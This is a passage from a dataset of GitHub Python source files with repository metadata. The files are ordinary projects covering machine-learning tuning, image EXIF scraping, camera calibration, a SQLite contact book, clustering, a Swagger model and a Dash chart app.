Since the training set has more data, it is best to use it instead of the validation set.\n\"\"\"\n\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom utils import split_feats_targs, capture_features, capture_targets,export_results\n\n(train_features, train_targets) = split_feats_targs('train_1.csv') # pass training set with targets\ntest_features = capture_features('test_no_label_1.csv', False) # pass test set without targets\nactual_targets = capture_targets('test_with_label_1.csv') # pass test set with targets\n\n\"\"\"\nParameter options to tune:\n • activation function: sigmoid, tanh, relu and identity\n • 2 network architectures of your choice: for eg 2 hidden layers with 30+50 nodes, 3 hidden layers with 10+10\n • solver: Adam and stochastic gradient descent\n\"\"\"\n\nprint(\"Finding best hyperparameters for MLP....\")\nbest_mlp = GridSearchCV(MLPClassifier(), {\n 'activation': ['identity', 'logistic', 'tanh', 'relu'],\n 'hidden_layer_sizes': [(30,50), (10,10,10)],\n 'solver': ['sgd', 'adam']\n}, return_train_score = False, n_jobs = -1)\n\nbest_mlp.fit(train_features, train_targets)\nbest_params = best_mlp.best_params_ # records best found params from gridsearch\nprint(\"Best hyperparameters for MLP:\")\nprint(best_params)\nprint(\"\\n\")\n\nbest_mlp = MLPClassifier(activation=best_params['activation'],hidden_layer_sizes=best_params['hidden_layer_sizes'] ,solver=best_params['solver'])\nfitted_mlp = best_mlp.fit(train_features, train_targets) # fits model with training set values\npredicted_targets = list(fitted_mlp.predict(test_features)) # gets predictions from model and record them\nexport_results(actual_targets, predicted_targets, 'Best-MLP-DS1.csv')\n", "repo_name": "KonstH/comp472-a1", "sub_path": "dataset1/Best_MLP.py", "file_name": "Best_MLP.py", "file_ext": "py", "file_size_in_byte": 2058, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.split_feats_targs", "line_number": 12, "usage_type": "call"}, {"api_name": "utils.capture_features", "line_number": 13, "usage_type": "call"}, {"api_name": "utils.capture_targets", "line_number": 14, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 24, "usage_type": "call"}, {"api_name": "sklearn.neural_network.MLPClassifier", "line_number": 24, "usage_type": "call"}, {"api_name": "sklearn.neural_network.MLPClassifier", "line_number": 36, "usage_type": "call"}, {"api_name": "utils.export_results", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "5426024532", "text": "import xarray\nimport numpy\nimport matplotlib.pyplot as plt\n\nt = 0.01\nr = 0.75\n\nif __name__ == \"__main__\":\n value = [[1, 4, 2, 9], [2, 7, 6, 1], [6, 3, 5, 8], [3, 2, 2, 1]]\n plt.imshow(value)\n plt.show()\n ds = xarray.Dataset(\n data_vars={\n \"v\": (\n (\"x\", \"y\"),\n value,\n ),\n },\n coords={\"x\": [0.0, 0.75, 1.5, 2.25], \"y\": [3.0, 2.25, 1.5, 0.75]},\n )\n ds_xs = ds[\"x\"]\n ds_ys = ds[\"y\"]\n ds_xs = numpy.array(ds_xs)\n n_xs = numpy.arange(ds_xs[0]-r/2, ds_xs[len(ds_xs)-1] + r/2, t)\n n_ys = numpy.arange(ds_ys[0]+r/2, ds_ys[len(ds_ys)-1] - r/2, -t)\n n_ds = ds.interp(x=n_xs, y=n_ys, method=\"nearest\", kwargs={\"fill_value\": \"extrapolate\"})\n plt.imshow(n_ds[\"v\"])\n plt.show()\n # print(n_ds[\"v\"])", "repo_name": "Bosh0113/MISR_AHI", "sub_path": "AHI_AC/test/test_interp.py", "file_name": "test_interp.py", "file_ext": "py", "file_size_in_byte": 798, 
"program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.imshow", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "xarray.Dataset", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "23214018126", "text": "from PyQt5.QtWidgets import QWidget\nfrom PyQt5.uic import loadUi\n\n\nclass MyWidget(QWidget):\n def __init__(self, uiFile, parent):\n # Se non funziona lo scroll di un qualsiasi scroll area + layout, devi stattare MIN/MAX\n # sulla form contenente il widget!!\n super().__init__(parent)\n loadUi(uiFile, self)\n for bigButton in list(filter(lambda el: 'icon' in el.lower(), self.__dict__.keys())):\n getattr(self, bigButton).setMargin(10)\n", "repo_name": "MrPio/MuseoOmero-Python", "sub_path": "frontend/view/my_widget.py", "file_name": "my_widget.py", "file_ext": "py", "file_size_in_byte": 479, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 5, "usage_type": "name"}, {"api_name": "PyQt5.uic.loadUi", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "39708960869", "text": "import sqlite3\nimport uuid\n\nif __name__ == \"__main__\":\n\n print(\"MENU\")\n print(\"1. Insert new contact\")\n print(\"2. View all contact\")\n print(\"3. Search contact\")\n choice = int(input(\"Enter choice: \"))\n\n conn = sqlite3.connect('contact.db')\n cursor = conn.cursor()\n\n # check if table person exists\n # conn.execute(\"DROP TABLE PERSON\")\n try:\n conn.execute('''CREATE TABLE PERSON\n (ID TEXT PRIMARY KEY,\n NAME TEXT NOT NULL,\n NUMBER TEXT NOT NULL);''')\n print(\"Table created successfully\")\n\n except Exception as e:\n print(e)\n\n if choice == 1:\n nextId = str(uuid.uuid4())\n print(type(nextId))\n name = input(\"Name: \")\n number = input(\"Number: \")\n cursor.execute(\"insert into PERSON (ID, NAME, NUMBER) values (?, ?, ?)\",\n (nextId, name, number))\n conn.commit()\n print(\"Records created successfully\")\n\n elif choice == 2:\n data = conn.execute(\"SELECT id, name, number FROM PERSON\")\n for row in data:\n print(\"ID = \" + row[0])\n print(\"NAME = \" + row[1])\n print(\"NUMBER = \" + str(row[2]) + '\\n\\n')\n\n elif choice == 3:\n print(\"1. Search by name\")\n print(\"2. 
Search by number\")\n choice = int(input(\"Enter choice: \"))\n if choice == 1:\n name = input(\"Name: \")\n data = conn.execute(\"SELECT id, name, number FROM PERSON WHERE name =?\", (name,))\n for row in data:\n print(\"ID = \" + row[0])\n print(\"NAME = \" + row[1])\n print(\"NUMBER = \" + str(row[2]) + '\\n\\n')\n elif choice == 2:\n number = input(\"Number: \")\n data = conn.execute(\"SELECT id, name, number FROM PERSON WHERE number =?\", (number,))\n for row in data:\n print(\"ID = \" + row[0])\n print(\"NAME = \" + row[1])\n print(\"NUMBER = \" + str(row[2]) + '\\n\\n')\n\n conn.close()\n", "repo_name": "shafiq97/Python-Beginner-Project", "sub_path": "Contact Book.py", "file_name": "Contact Book.py", "file_ext": "py", "file_size_in_byte": 2048, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlite3.connect", "line_number": 12, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "24219655687", "text": "# -*- coding:utf-8 -*-\nimport requests\nfrom lxml import etree\nimport os\n\nstart_urls = ['http://www.szpb.gov.cn/xxgk/qt/tzgg/index.htm']\nfor i in range(1, 41):\n start_urls.append('http://www.szpb.gov.cn/xxgk/qt/tzgg/index_' + str(i) + '.htm')\n\nfor url in start_urls:\n print(url)\n page_req = requests.get(url)\n html = page_req.text.encode('iso-8859-1').decode('gbk')\n selector = etree.HTML(html, parser=None, base_url=None)\n contents = selector.xpath('//span[contains(text(), \"节能\")][contains(text(), \"2015\")][contains(text(), \"项目公示\")][contains(@class, \"p_bt\")]/../@href')\n # if os.path.isfile('result.txt'):\n # os.remove(\"result.txt\")\n for text in contents:\n with open(\"result.txt\", \"a\") as file :\n link = 'http://www.szpb.gov.cn/xxgk/qt/tzgg/' + text.replace(\"./\", \"\")\n file.write(link + '\\n')", "repo_name": "ichsonx/fgwspider", "sub_path": "fgw.py", "file_name": "fgw.py", "file_ext": "py", "file_size_in_byte": 864, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 12, "usage_type": "call"}, {"api_name": "lxml.etree.HTML", "line_number": 14, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 14, "usage_type": "name"}]} +{"seq_id": "72701440169", "text": "'''\nScrape.py is the main scraper.\n\nIt scrapes the S3 Bucket XML, parses it, and navigates\nto each key. It attempts to download and pare the key\nof each file, skipping the key when it fails.\n\nIt uses an port of the Python Image Library to process\nbinary data retrieved from the S3 bucket. 
It then uses\nthe local db module to store the metadata and EXIF data\nof the image in the database.\n\nCurrently, it is tightly coupled to the waldo-recruting\nS3 bucket, and could use a layer of abstraction around\nimage locations.\n'''\n\n#Standard library modules\nimport time\nimport xml.etree.ElementTree as ET\nfrom io import BytesIO\nfrom os.path import splitext\n\n#Dependency modules\nimport requests\nfrom PIL import Image, ExifTags\n\n#Local modules\nfrom db import ImageDatabase as ID\n\nS3_DOCS = '{http://s3.amazonaws.com/doc/2006-03-01/}'\nBUCKET_URL = 'http://s3.amazonaws.com/waldo-recruiting'\n\n#Downloads the images from the S3 bucket\ndef run():\n #Setup database\n db = ID()\n db.setup()\n\n resp = requests.get(BUCKET_URL)\n bucket_result = ET.fromstring(resp.text)\n contents_elems = bucket_result.findall('%sContents' % S3_DOCS)\n for e in contents_elems:\n filename = e.find('%sKey' % S3_DOCS).text\n print('Inserting ', filename)\n url = \"%s/%s\" % (BUCKET_URL, filename)\n try:\n photo = Image.open(BytesIO(requests.get(url).content))\n except OSError as e:\n print(filename, ' failed to open. Skipping...')\n continue\n\n photo_id = db.insert_photo(\n url,\n filename,\n splitext(filename)[1],\n photo.height,\n photo.width\n )\n try:\n photo_exif = photo._getexif()\n except AttributeError as ae:\n print(filename, \"has no exif data. Keeping image and skipping exif\")\n continue\n for tag_no, value in photo_exif.items():\n try:\n tag_name = ExifTags.TAGS[tag_no]\n except KeyError as ke:\n print(\"Exif tag not recognized. Skipping...\")\n continue\n \n #Bad values are currently being skipped. A future improvement\n #could handle bad values more gracefully by working with\n #database schema improvements to work with specific data\n #more directly.\n print(\"Adding\", tag_name, \"to photo\", photo_id, \"-\", value)\n try:\n db.insert_exif(photo_id, tag_no, ExifTags.TAGS[tag_no], value)\n except ValueError as ve:\n print(tag_name, \"had a bad value. 
Skipping...\")\n continue\n print(filename, ' successfully inserted')\n time.sleep(999999999)\n\nif __name__ == '__main__':\n run()\n", "repo_name": "downpat/exif-scraper", "sub_path": "scraper/scrape.py", "file_name": "scrape.py", "file_ext": "py", "file_size_in_byte": 2746, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "db.ImageDatabase", "line_number": 37, "usage_type": "call"}, {"api_name": "db.setup", "line_number": 38, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 40, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.fromstring", "line_number": 41, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 41, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 48, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 48, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 48, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 48, "usage_type": "call"}, {"api_name": "db.insert_photo", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 56, "usage_type": "call"}, {"api_name": "PIL.ExifTags.TAGS", "line_number": 67, "usage_type": "attribute"}, {"api_name": "PIL.ExifTags", "line_number": 67, "usage_type": "name"}, {"api_name": "db.insert_exif", "line_number": 78, "usage_type": "call"}, {"api_name": "PIL.ExifTags.TAGS", "line_number": 78, "usage_type": "attribute"}, {"api_name": "PIL.ExifTags", "line_number": 78, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "26380597293", "text": "from django.core.files.storage import FileSystemStorage\nfrom django.conf import settings\nfrom .authentication import *\nfrom io import StringIO\nfrom rest_framework.parsers import JSONParser\nimport json\n\nclass OverwiteStorageSystem(FileSystemStorage):\n \n def get_available_name(self, name, max_length=None):\n # if the file name already exists, remove it as if it was a true file system\n if self.exists(name):\n self.delete(name)\n return super().get_available_name(name, max_length)\n\n\ndef range_with_floats(start, stop, step=1):\n while stop > start:\n yield start\n start += step\n\ndef get_host_name(request):\n if request.is_secure():\n return f'https://{request.get_host()}'\n return f'http://{request.get_host()}'\n\n\ndef get_list_index(list, index, default):\n try:\n return list[4]\n except IndexError:\n return default\n", "repo_name": "samuelitwaru/wex-erp", "sub_path": "utils/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 897, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.core.files.storage.FileSystemStorage", "line_number": 8, "usage_type": "name"}]} +{"seq_id": "12191640907", "text": "import cv2\nfrom cv2 import drawChessboardCorners\nimport numpy as np\ncap = cv2.VideoCapture(0)\npic = []\n\nobjp = np.zeros((9*6,3), np.float32)\n# for i in range(6):\n# for j in range(9):\n# objp[i*9+j]=(i,j,0)\n\nobjp[:, :2]=np.mgrid[0:9, 0:6].T.reshape(-1, 2)\nprint(objp)\nobjpoints = []\nimgpoints = []\nwhile len(objpoints) < 50:\n ret, frame = cap.read()\n h,w = frame.shape[:2]\n gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n ret2, corner = cv2.findChessboardCorners(gray_frame, (9,6))\n cv2.imshow(\"frame\", frame)\n cv2.waitKey(33)\n if ret2:\n corner2 = cv2.cornerSubPix(gray_frame,corner, 
(11,11), (-1,-1), (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.1))\n objpoints.append(objp.copy())\n imgpoints.append(corner2)\n drawn_frame = drawChessboardCorners(frame, (9, 6), corner2, ret2)\n cv2.imshow(\"frame\", drawn_frame)\n cv2.waitKey(33)\n\nret, cameraMatrix, distCoeffs, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, (h, w), None, None)\nf = cv2.FileStorage(\"calibrate.xml\", cv2.FILE_STORAGE_WRITE)\nf.write(\"intrinsic\", cameraMatrix)\nf.write(\"distortion\", distCoeffs)\nf.release()", "repo_name": "jayin92/NYCU-cv-and-uav", "sub_path": "lab04/camerea_cali.py", "file_name": "camerea_cali.py", "file_ext": "py", "file_size_in_byte": 1171, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cv2.VideoCapture", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 7, "usage_type": "attribute"}, {"api_name": "numpy.mgrid", "line_number": 12, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 19, "usage_type": "attribute"}, {"api_name": "cv2.findChessboardCorners", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.cornerSubPix", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.TERM_CRITERIA_EPS", "line_number": 24, "usage_type": "attribute"}, {"api_name": "cv2.TERM_CRITERIA_MAX_ITER", "line_number": 24, "usage_type": "attribute"}, {"api_name": "cv2.drawChessboardCorners", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.calibrateCamera", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.FileStorage", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.FILE_STORAGE_WRITE", "line_number": 32, "usage_type": "attribute"}]} +{"seq_id": "24656845249", "text": "# © 2023, Universität Bern, Chair of Quantitative Methods, Vanessa Tran, Manuel Kammermann, Philipp Baumann\n\nimport pandas as pd\nimport numpy as np\nfrom mpfcc_algorithm import mpfcc\nimport matplotlib.pyplot as plt\n\n# Read data of illustrative example\ndf = pd.read_csv('illustrative_example.csv')\n\n# Extract features and colors\nX = df.values[:, 1:-1]\ncolors = df.values[:, -1].astype(int)\n\n# Define parameters\nnumber_of_clusters = 3\nmax_cardinality = 11\nmin_balance = 1\n\n# Run MPFCC-Algorithm\nlabels = mpfcc(X, colors, number_of_clusters, max_cardinality, min_balance,\n random_state=24, mpfcc_time_limit=300)\n\n# Visualize resulting partition\ncenters = np.unique(labels)\nplt.scatter(X[:, 0], X[:, 1], c=np.array(['red', 'blue'])[colors], s=30, zorder=10)\nfor i in range(X.shape[0]):\n plt.plot([X[i, 0], X[labels[i], 0]], [X[i, 1], X[labels[i], 1]],\n color='black', linewidth=0.8, zorder=-1, alpha=0.2)\nplt.show()\n", "repo_name": "phil85/MPFCC-Algorithm", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 942, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 9, "usage_type": "call"}, {"api_name": "mpfcc_algorithm.mpfcc", "line_number": 21, "usage_type": 
"call"}, {"api_name": "numpy.unique", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "1104321639", "text": "# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom swagger_server.models.base_model_ import Model\nfrom swagger_server.models.account_identifier import AccountIdentifier # noqa: F401,E501\nfrom swagger_server.models.amount import Amount # noqa: F401,E501\nfrom swagger_server.models.coin_change import CoinChange # noqa: F401,E501\nfrom swagger_server.models.operation_identifier import OperationIdentifier # noqa: F401,E501\nfrom swagger_server import util\n\n\nclass Operation(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n def __init__(self, operation_identifier: OperationIdentifier=None, related_operations: List[OperationIdentifier]=None, type: str=None, status: str=None, account: AccountIdentifier=None, amount: Amount=None, coin_change: CoinChange=None, metadata: object=None): # noqa: E501\n \"\"\"Operation - a model defined in Swagger\n\n :param operation_identifier: The operation_identifier of this Operation. # noqa: E501\n :type operation_identifier: OperationIdentifier\n :param related_operations: The related_operations of this Operation. # noqa: E501\n :type related_operations: List[OperationIdentifier]\n :param type: The type of this Operation. # noqa: E501\n :type type: str\n :param status: The status of this Operation. # noqa: E501\n :type status: str\n :param account: The account of this Operation. # noqa: E501\n :type account: AccountIdentifier\n :param amount: The amount of this Operation. # noqa: E501\n :type amount: Amount\n :param coin_change: The coin_change of this Operation. # noqa: E501\n :type coin_change: CoinChange\n :param metadata: The metadata of this Operation. # noqa: E501\n :type metadata: object\n \"\"\"\n self.swagger_types = {\n 'operation_identifier': OperationIdentifier,\n 'related_operations': List[OperationIdentifier],\n 'type': str,\n 'status': str,\n 'account': AccountIdentifier,\n 'amount': Amount,\n 'coin_change': CoinChange,\n 'metadata': object\n }\n\n self.attribute_map = {\n 'operation_identifier': 'operation_identifier',\n 'related_operations': 'related_operations',\n 'type': 'type',\n 'status': 'status',\n 'account': 'account',\n 'amount': 'amount',\n 'coin_change': 'coin_change',\n 'metadata': 'metadata'\n }\n self._operation_identifier = operation_identifier\n self._related_operations = related_operations\n self._type = type\n self._status = status\n self._account = account\n self._amount = amount\n self._coin_change = coin_change\n self._metadata = metadata\n\n @classmethod\n def from_dict(cls, dikt) -> 'Operation':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The Operation of this Operation. 
# noqa: E501\n :rtype: Operation\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def operation_identifier(self) -> OperationIdentifier:\n \"\"\"Gets the operation_identifier of this Operation.\n\n\n :return: The operation_identifier of this Operation.\n :rtype: OperationIdentifier\n \"\"\"\n return self._operation_identifier\n\n @operation_identifier.setter\n def operation_identifier(self, operation_identifier: OperationIdentifier):\n \"\"\"Sets the operation_identifier of this Operation.\n\n\n :param operation_identifier: The operation_identifier of this Operation.\n :type operation_identifier: OperationIdentifier\n \"\"\"\n if operation_identifier is None:\n raise ValueError(\"Invalid value for `operation_identifier`, must not be `None`\") # noqa: E501\n\n self._operation_identifier = operation_identifier\n\n @property\n def related_operations(self) -> List[OperationIdentifier]:\n \"\"\"Gets the related_operations of this Operation.\n\n Restrict referenced related_operations to identifier indices < the current operation_identifier.index. This ensures there exists a clear DAG-structure of relations. Since operations are one-sided, one could imagine relating operations in a single transfer or linking operations in a call tree. # noqa: E501\n\n :return: The related_operations of this Operation.\n :rtype: List[OperationIdentifier]\n \"\"\"\n return self._related_operations\n\n @related_operations.setter\n def related_operations(self, related_operations: List[OperationIdentifier]):\n \"\"\"Sets the related_operations of this Operation.\n\n Restrict referenced related_operations to identifier indices < the current operation_identifier.index. This ensures there exists a clear DAG-structure of relations. Since operations are one-sided, one could imagine relating operations in a single transfer or linking operations in a call tree. # noqa: E501\n\n :param related_operations: The related_operations of this Operation.\n :type related_operations: List[OperationIdentifier]\n \"\"\"\n\n self._related_operations = related_operations\n\n @property\n def type(self) -> str:\n \"\"\"Gets the type of this Operation.\n\n Type is the network-specific type of the operation. Ensure that any type that can be returned here is also specified in the NetworkOptionsResponse. This can be very useful to downstream consumers that parse all block data. # noqa: E501\n\n :return: The type of this Operation.\n :rtype: str\n \"\"\"\n return self._type\n\n @type.setter\n def type(self, type: str):\n \"\"\"Sets the type of this Operation.\n\n Type is the network-specific type of the operation. Ensure that any type that can be returned here is also specified in the NetworkOptionsResponse. This can be very useful to downstream consumers that parse all block data. # noqa: E501\n\n :param type: The type of this Operation.\n :type type: str\n \"\"\"\n if type is None:\n raise ValueError(\"Invalid value for `type`, must not be `None`\") # noqa: E501\n\n self._type = type\n\n @property\n def status(self) -> str:\n \"\"\"Gets the status of this Operation.\n\n Status is the network-specific status of the operation. Status is not defined on the transaction object because blockchains with smart contracts may have transactions that partially apply (some operations are successful and some are not). Blockchains with atomic transactions (all operations succeed or all operations fail) will have the same status for each operation. 
On-chain operations (operations retrieved in the `/block` and `/block/transaction` endpoints) MUST have a populated status field (anything on-chain must have succeeded or failed). However, operations provided during transaction construction (often times called \\\"intent\\\" in the documentation) MUST NOT have a populated status field (operations yet to be included on-chain have not yet succeeded or failed). # noqa: E501\n\n :return: The status of this Operation.\n :rtype: str\n \"\"\"\n return self._status\n\n @status.setter\n def status(self, status: str):\n \"\"\"Sets the status of this Operation.\n\n Status is the network-specific status of the operation. Status is not defined on the transaction object because blockchains with smart contracts may have transactions that partially apply (some operations are successful and some are not). Blockchains with atomic transactions (all operations succeed or all operations fail) will have the same status for each operation. On-chain operations (operations retrieved in the `/block` and `/block/transaction` endpoints) MUST have a populated status field (anything on-chain must have succeeded or failed). However, operations provided during transaction construction (often times called \\\"intent\\\" in the documentation) MUST NOT have a populated status field (operations yet to be included on-chain have not yet succeeded or failed). # noqa: E501\n\n :param status: The status of this Operation.\n :type status: str\n \"\"\"\n\n self._status = status\n\n @property\n def account(self) -> AccountIdentifier:\n \"\"\"Gets the account of this Operation.\n\n\n :return: The account of this Operation.\n :rtype: AccountIdentifier\n \"\"\"\n return self._account\n\n @account.setter\n def account(self, account: AccountIdentifier):\n \"\"\"Sets the account of this Operation.\n\n\n :param account: The account of this Operation.\n :type account: AccountIdentifier\n \"\"\"\n\n self._account = account\n\n @property\n def amount(self) -> Amount:\n \"\"\"Gets the amount of this Operation.\n\n\n :return: The amount of this Operation.\n :rtype: Amount\n \"\"\"\n return self._amount\n\n @amount.setter\n def amount(self, amount: Amount):\n \"\"\"Sets the amount of this Operation.\n\n\n :param amount: The amount of this Operation.\n :type amount: Amount\n \"\"\"\n\n self._amount = amount\n\n @property\n def coin_change(self) -> CoinChange:\n \"\"\"Gets the coin_change of this Operation.\n\n\n :return: The coin_change of this Operation.\n :rtype: CoinChange\n \"\"\"\n return self._coin_change\n\n @coin_change.setter\n def coin_change(self, coin_change: CoinChange):\n \"\"\"Sets the coin_change of this Operation.\n\n\n :param coin_change: The coin_change of this Operation.\n :type coin_change: CoinChange\n \"\"\"\n\n self._coin_change = coin_change\n\n @property\n def metadata(self) -> object:\n \"\"\"Gets the metadata of this Operation.\n\n\n :return: The metadata of this Operation.\n :rtype: object\n \"\"\"\n return self._metadata\n\n @metadata.setter\n def metadata(self, metadata: object):\n \"\"\"Sets the metadata of this Operation.\n\n\n :param metadata: The metadata of this Operation.\n :type metadata: object\n \"\"\"\n\n self._metadata = metadata\n", "repo_name": "xanimo/rosetta-api", "sub_path": "server/python-flask-server-generated/swagger_server/models/operation.py", "file_name": "operation.py", "file_ext": "py", "file_size_in_byte": 10337, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": 
"swagger_server.models.base_model_.Model", "line_number": 16, "usage_type": "name"}, {"api_name": "swagger_server.models.operation_identifier.OperationIdentifier", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 21, "usage_type": "name"}, {"api_name": "swagger_server.models.account_identifier.AccountIdentifier", "line_number": 21, "usage_type": "name"}, {"api_name": "swagger_server.models.amount.Amount", "line_number": 21, "usage_type": "name"}, {"api_name": "swagger_server.models.coin_change.CoinChange", "line_number": 21, "usage_type": "name"}, {"api_name": "swagger_server.models.operation_identifier.OperationIdentifier", "line_number": 42, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 43, "usage_type": "name"}, {"api_name": "swagger_server.models.operation_identifier.OperationIdentifier", "line_number": 43, "usage_type": "name"}, {"api_name": "swagger_server.models.account_identifier.AccountIdentifier", "line_number": 46, "usage_type": "name"}, {"api_name": "swagger_server.models.amount.Amount", "line_number": 47, "usage_type": "name"}, {"api_name": "swagger_server.models.coin_change.CoinChange", "line_number": 48, "usage_type": "name"}, {"api_name": "swagger_server.util.deserialize_model", "line_number": 80, "usage_type": "call"}, {"api_name": "swagger_server.util", "line_number": 80, "usage_type": "name"}, {"api_name": "swagger_server.models.operation_identifier.OperationIdentifier", "line_number": 83, "usage_type": "name"}, {"api_name": "swagger_server.models.operation_identifier.OperationIdentifier", "line_number": 93, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 106, "usage_type": "name"}, {"api_name": "swagger_server.models.operation_identifier.OperationIdentifier", "line_number": 106, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 117, "usage_type": "name"}, {"api_name": "swagger_server.models.operation_identifier.OperationIdentifier", "line_number": 117, "usage_type": "name"}, {"api_name": "swagger_server.models.account_identifier.AccountIdentifier", "line_number": 177, "usage_type": "name"}, {"api_name": "swagger_server.models.account_identifier.AccountIdentifier", "line_number": 187, "usage_type": "name"}, {"api_name": "swagger_server.models.amount.Amount", "line_number": 198, "usage_type": "name"}, {"api_name": "swagger_server.models.amount.Amount", "line_number": 208, "usage_type": "name"}, {"api_name": "swagger_server.models.coin_change.CoinChange", "line_number": 219, "usage_type": "name"}, {"api_name": "swagger_server.models.coin_change.CoinChange", "line_number": 229, "usage_type": "name"}]} +{"seq_id": "9855663672", "text": "import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\nfrom dash.dependencies import Input,Output,State,MATCH,ALL\nimport pandas as pd\nimport pickle as pkl\nimport os\nimport base64\nimport plotly.express as px\nimport plotly.graph_objects as go\nimport json\nfrom flask import Flask\nimport math\nfrom dash_extensions.snippets import send_data_frame\nfrom dash_extensions import Download\nfrom collections import OrderedDict\nimport time\n\nline_fig=go.Figure()\ntext_font_size='1.7vh'\nnavbar_font_size='2vh'\nheader_font_size='2vh'\n\n\n# the div where the flow line chart will be inside it\n# dcc.Graph src : https://www.youtube.com/watch?v=G8r2BB3GFVY\n\nline_div=html.Div([\n dcc.Graph(id='flow_line_chart', config={'displayModeBar': True, 'scrollZoom': True,'displaylogo': False},\n 
